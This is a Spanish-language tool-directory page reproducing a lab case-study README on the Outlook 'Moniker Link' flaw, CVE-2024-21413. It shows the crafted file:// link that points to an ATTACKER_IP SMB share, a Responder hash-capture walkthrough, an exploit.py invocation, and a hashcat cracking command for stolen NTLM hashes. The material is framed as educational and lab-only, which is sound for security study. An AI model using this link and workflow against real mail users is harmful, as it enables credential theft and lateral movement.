Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Estudo-de-Caso-CVE-2024-21413 — Un estudio de caso del CVE-2024-21413. Usado como parámetro la sala de TryHackMe Moniker Link (CVE-2024-21413). Se hicieron ediciones con claude code en el exploit. | Kitploit
Herramientas/GitHubGitHub/pedro-lucas-melo/estudo-de-caso-cve-2024-21413
Descifrado de ContraseñasAnálisis de VulnerabilidadesExplotaciónMovimiento LateralPhishingCTFAprendizaje y EducaciónSeguridad de Correo ElectrónicoLabs y Práctica

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHubpedro-lucas-melo/estudo-de-caso-cve-2024-21413

Estudo-de-Caso-CVE-2024-21413

Un estudio de caso del CVE-2024-21413. Usado como parámetro la sala de TryHackMe Moniker Link (CVE-2024-21413). Se hicieron ediciones con claude code en el exploit.

Ver Repositorio
7hace 5 mesesAún no revisado

CVE-2024-21413 — Moniker Link 🔗💀

Microsoft Outlook RCE + Filtración de Credenciales NTLM

⚠️ Aviso Legal: Este repositorio es exclusivamente con fines educativos y de investigación en seguridad. Todas las demostraciones se realizaron en entornos controlados y aislados. El uso de estas técnicas contra sistemas sin autorización explícita es ilegal y no ético.


📋 Índice

  • Visión General
  • Cómo Funciona la Vulnerabilidad
  • Entorno de Laboratorio
  • Demostración Paso a Paso
  • Script del Exploit
  • Diagrama del Ataque
  • Mitigación y Defensa
  • CVE Breakdown
  • Referencias

🔍 Visión General

CampoDetalle
CVECVE-2024-21413
Divulgación13 de febrero de 2024 (Patch Tuesday)
CVSS Score9.8 (Crítico)
ProductoMicrosoft Outlook
TipoRCE + Filtración de Credenciales (Hash NTLM)
VectorRed / Correo (sin autenticación previa)
InteracciónRequiere interacción del usuario (clic en el enlace)
ApodoMoniker Link

La CVE-2024-21413 es una vulnerabilidad crítica en Microsoft Outlook que permite a un atacante:

  1. Filtrar credenciales NTLM de la víctima al forzar una autenticación SMB automática
  2. Ejecutar código remotamente en la máquina objetivo a través de un enlace malicioso en un correo

El nombre "Moniker Link" proviene de la explotación de Component Object Model (COM) Monikers — un mecanismo de Windows para referenciar objetos por cadena — para eludir las protecciones de Outlook contra enlaces file://.


🧠 Cómo Funciona la Vulnerabilidad

El Problema: Bypass de la Vista Protegida

Normalmente, Outlook bloquea los enlaces file:// que apuntan a recursos de red, mostrando una advertencia de seguridad (Vista Protegida). La falla está en la forma en que Outlook procesa las URL que contienen el carácter ! — un separador de Moniker.

La Explotación

Un enlace malicioso con el formato:

root@kitploit:~
file:///\\ATTACKER_IP\share\!something

El carácter ! hace que el analizador de Outlook interprete la URL como una referencia a un COM Moniker, ignorando las verificaciones de seguridad normales. El resultado:

  • La máquina de la víctima intenta autenticarse automáticamente a través de SMB en el servidor del atacante
  • Durante esa autenticación, el hash NTLM de la víctima se transmite
  • Ese hash puede usarse en ataques de Pass-the-Hash o descifrado offline

Flujo Simplificado

root@kitploit:~
Atacante envía correo → Víctima hace clic en el enlace → Outlook procesa URL con "!"
→ Bypass de la Vista Protegida → Conexión SMB automática → Hash NTLM capturado

🖥️ Entorno de Laboratorio

Para reproducir este caso de estudio de forma segura:

MáquinaSistema OperacionalRol
AtacanteKali LinuxListener SMB + Exploit
ObjetivoWindows 10/11 con Outlook vulnerableVíctima

Importante: Use una red aislada (NAT o Host-Only en VirtualBox/VMware). Nunca lo ejecute en redes reales.

Herramientas Necesarias

root@kitploit:~
# Responder — listener SMB/HTTP para captura de hashes
sudo apt install responder

# Python 3 — para ejecutar el exploit
python3 --version

# Verificar conectividad entre las máquinas
ping <IP_OBJETIVO>

🚀 Demostración Paso a Paso

Paso 1 — Identificar la IP de la Máquina Atacante

root@kitploit:~
ip a | grep inet
# Anote la IP de la interfaz que se comunica con el objetivo (ej: 192.168.56.10)

Paso 2 — Iniciar el Responder

El Responder crea un servidor SMB falso que captura hashes de autenticación NTLM.

root@kitploit:~
sudo responder -I eth0 -v
# Reemplace eth0 por su interfaz de red

Salida esperada:

root@kitploit:~
[+] Listening for events...
[SMB] NTLMv2-SSP Client   : 192.168.56.20
[SMB] NTLMv2-SSP Username : DESKTOP-OBJETIVO\usuario
[SMB] NTLMv2-SSP Hash     : usuario::DESKTOP-OBJETIVO:...

Paso 3 — Ejecutar el Exploit

root@kitploit:~
python3 exploit.py \
  --sender [email protected] \
  --recipient [email protected] \
  --server <IP_SERVIDOR_CORREO> \
  --attacker-ip 192.168.56.10

Paso 4 — Esperar que la Víctima Haga Clic en el Enlace

Cuando la víctima abre el correo y hace clic en el enlace, el Responder captura automáticamente el hash NTLM. Este hash puede ser:

  • Analizado para identificar la cuenta comprometida
  • Usado en Pass-the-Hash para autenticación lateral en la red
  • Enviado a Hashcat/John para intento de descifrado offline:
root@kitploit:~
hashcat -m 5600 hash.txt wordlist.txt

🐍 Script del Exploit

Vea el archivo exploit.py para el script completo y comentado.


📊 Diagrama del Ataque

Vea el archivo diagrama-ataque.html para una visualización interactiva del flujo completo del ataque.


🛡️ Mitigación y Defensa

Vea el archivo MITIGACAO.md para la guía completa de mitigación y defensa.


📄 CVE Breakdown

Vea el archivo CVE-BREAKDOWN.md para el análisis técnico detallado de la vulnerabilidad.


📚 Referencias

  • Microsoft Security Advisory — CVE-2024-21413
  • Morphisec — Moniker Link Research
  • TryHackMe — Moniker Link Room
  • Responder Tool — GitHub
  • NTLM Authentication — Microsoft Docs
  • NVD — CVE-2024-21413

👤 Autor

Caso de estudio desarrollado como parte de entrenamiento práctico en seguridad ofensiva a través de TryHackMe.

Este proyecto sigue los principios de responsible disclosure y ethical hacking. Todo el contenido aquí presente tiene como objetivo la educación y la mejora de la postura de seguridad.

Descargar herramienta